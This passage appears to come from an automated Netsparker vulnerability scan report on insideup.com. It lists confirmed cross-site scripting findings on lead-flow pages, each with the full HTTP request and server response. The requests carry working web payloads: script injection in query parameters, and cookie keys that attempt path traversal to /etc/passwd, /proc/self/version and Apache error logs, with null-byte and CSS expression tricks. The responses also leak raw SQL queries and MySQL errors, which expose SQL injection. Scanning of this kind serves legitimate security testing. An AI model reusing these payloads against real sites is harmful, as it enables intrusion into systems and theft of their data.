OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=86kigrjppkr57lue04dn65iav5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/

/ppc/leadflow/bulo00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/?'"--></style></script><script>alert(0x0005CB)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005CB)</script>

Request

GET /ppc/leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vp7uoea37b18l3htgqem4g3882; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '"--></style></script><script>alert(0x0005C9)</script>

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e7pk8akqc7ql41mhkjn57e51v0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/

/ppc/leadflow/inco00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/?'"--></style></script><script>alert(0x0005BF)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005BF)</script>

Request

GET /ppc/leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 